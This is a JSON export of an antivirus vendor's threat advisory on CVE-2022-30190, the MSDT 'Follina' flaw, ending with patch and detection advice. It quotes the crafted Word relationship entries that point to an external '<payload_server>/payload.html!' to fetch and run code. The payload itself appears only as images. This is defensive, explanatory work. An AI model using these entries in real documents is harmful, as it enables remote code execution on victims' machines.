{"id":1181,"date":"2022-06-26T06:00:40","date_gmt":"2022-06-26T06:00:40","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=1181"},"modified":"2024-02-14T11:51:46","modified_gmt":"2024-02-14T11:51:46","slug":"exploit-win32-cve-2022-30190-a","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2022\/06\/26\/exploit-win32-cve-2022-30190-a\/","title":{"rendered":"Exploit.Win32.CVE-2022-30190.a"},"content":{"rendered":"<h2 style=\"text-align: justify\">Overview:<\/h2>\n<p style=\"text-align: justify\"><strong>Type:<\/strong> Vulnerability<\/p>\n<p style=\"text-align: justify\"><strong>Vulnerable Platform:<\/strong> Windows<\/p>\n<p style=\"text-align: justify\"><strong>Vulnerable Versions:<\/strong> All Windows versions<\/p>\n<p style=\"text-align: justify\"><strong>Patch\u00a0release date:<\/strong> <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-30190\" target=\"_blank\" rel=\"noopener\">14, June 2022\u00a0\u00a0<\/a><\/p>\n<p style=\"text-align: justify\"><strong>Vulnerable module:<\/strong> Microsoft Support Diagnostic Tool (MSDT)<\/p>\n<p style=\"text-align: justify\"><strong>Vulnerability type:<\/strong> Remote Code Execution<\/p>\n<p style=\"text-align: justify\"><strong>Risk Level:<\/strong>\u00a0High (CVSS:3.1 7.8 \/ 7.0)<\/p>\n<h3 style=\"text-align: justify\">What is a Vulnerability?<\/h3>\n<p style=\"text-align: justify\">In computer security, Vulnerability is a weak point in a platform that can be exploited by an intruder or malware and cause unauthorized access to the victim&#8217;s system. Vulnerabilities let intruders execute arbitrary commands, access to system&#8217;s memory, install malware and siphon data, and wipe and change enterprise and organizational critical information.<\/p>\n<h3 style=\"text-align: justify\">How an intruder uses CVE-2022-30190<\/h3>\n<p style=\"text-align: justify\">The <strong>Doc\/Docx<\/strong> contains malicious <strong>XML<\/strong> (document.xml.rels) and a malicious <strong>RTF,<\/strong> abusing the <strong>MSDT<\/strong> flaw to download and execute its malicious payload. As a result, the intruder first must lure the victim to somehow execute the document which normally happens through email. For <strong>RTF<\/strong> files, purely, viewing the file through <strong>Preview Pane<\/strong> is enough and the intruder can perform his malicious activity without even opening the file.<\/p>\n<h2 style=\"text-align: justify\">Technical explanation<\/h2>\n<h3 style=\"text-align: justify\">Vulnerability details for Doc\/Docx files<\/h3>\n<p style=\"text-align: justify\">If the malicious file is extracted, you can view the following contents from the <strong>word\/_rels\/document.xml.rels<\/strong>:<\/p>\n<p style=\"text-align: justify\"><img decoding=\"async\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2022\/06\/111.png\" alt=\"file content\" \/><\/p>\n<p style=\"text-align: justify\">Figure 1- contents of the malicious <strong>XML<\/strong> file<\/p>\n<p style=\"text-align: justify\">The created items by the attacker are as follows:<\/p>\n<p dir=\"ltr\" style=\"text-align: justify\"><strong>1. Type=\u201dhttp:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/oleObject\u201d<\/strong><\/p>\n<p dir=\"ltr\" style=\"text-align: justify\"><strong>2. Target = \u201chttp:\/\/&lt;payload_server&gt;\/payload.html!\u201d<\/strong><\/p>\n<p dir=\"ltr\" style=\"text-align: justify\"><strong>3. TargetMode = \u201cExternal\u201d<\/strong><\/p>\n<p dir=\"ltr\" style=\"text-align: justify\">All the above actions cause <strong>Microsoft Office<\/strong> to automatically download a link from its malicious server (2nd option) that contains malicious payload in the form of the following figure and run it by <strong>msdt.exe<\/strong> process as a subset of opened office file.<\/p>\n<p dir=\"ltr\" style=\"text-align: justify\"><img decoding=\"async\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2022\/06\/222.png\" alt=\"Malicious payload\" \/><\/p>\n<p dir=\"ltr\" style=\"text-align: justify\">Figure 2- the form of the malicious payload which contains <strong>XML<\/strong> or <strong>RTF<\/strong> file and will be downloaded and executed when the client clicks on the link<\/p>\n<p dir=\"ltr\" style=\"text-align: justify\">The above figure is the main part of exploiting this vulnerability which uses a shame for ms-msdt to download <strong>PCWDiagnostic<\/strong> with <strong>IT_BrowsForFile<\/strong> parameters so it can recall the desired malicious payloads.<\/p>\n<h3 style=\"text-align: justify\">Details of vulnerability for RTF files<\/h3>\n<p dir=\"ltr\" style=\"text-align: justify\">In the following you can view the changes that occur in an <strong>RTF<\/strong> file containing vulnerability:<\/p>\n<p dir=\"ltr\" style=\"text-align: justify\"><img decoding=\"async\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2022\/06\/333.png\" alt=\"RTF \" \/><\/p>\n<p dir=\"ltr\" style=\"text-align: justify\">Figure 3- The malicious part of the <strong>RTF<\/strong> file<\/p>\n<p dir=\"ltr\" style=\"text-align: justify\"><strong>Note:<\/strong> the above link (in the Figure) points to the malicious payload (Figure 2).<\/p>\n<h2 style=\"text-align: justify\">Security measures<\/h2>\n<h3 style=\"text-align: justify\">How to mitigate and disinfect the system<\/h3>\n<p dir=\"ltr\" style=\"text-align: justify\"><strong><a href=\"https:\/\/padvish.com\/fa-ir\/main\" target=\"_blank\" rel=\"noopener\">Padvish Antivirus<\/a><\/strong>\u00a0detects and removes these types of vulnerabilities. <strong>Padvish IPS<\/strong> (Intrusion Prevention System) detects and prevents all endeavors to break into the system through this vulnerability. To prevent any possible infection due to the files that use this flaw, it is recommended to use <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-30190\" target=\"_blank\" rel=\"noopener\">Microsoft-released Patch<\/a> for this vulnerability.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview: Type: Vulnerability Vulnerable Platform: Windows Vulnerable Versions: All Windows versions Patch\u00a0release date: 14, June 2022\u00a0\u00a0 Vulnerable module: Microsoft Support Diagnostic Tool (MSDT) Vulnerability type: Remote Code Execution Risk Level:\u00a0High (CVSS:3.1 7.8 \/ 7.0) What is a Vulnerability? In computer security, Vulnerability is a weak point in a platform that can be exploited by an&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":["post-1181","post","type-post","status-publish","format-standard","hentry","category-exploit"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=1181"}],"version-history":[{"count":7,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1181\/revisions"}],"predecessor-version":[{"id":1419,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1181\/revisions\/1419"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=1181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=1181"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=1181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}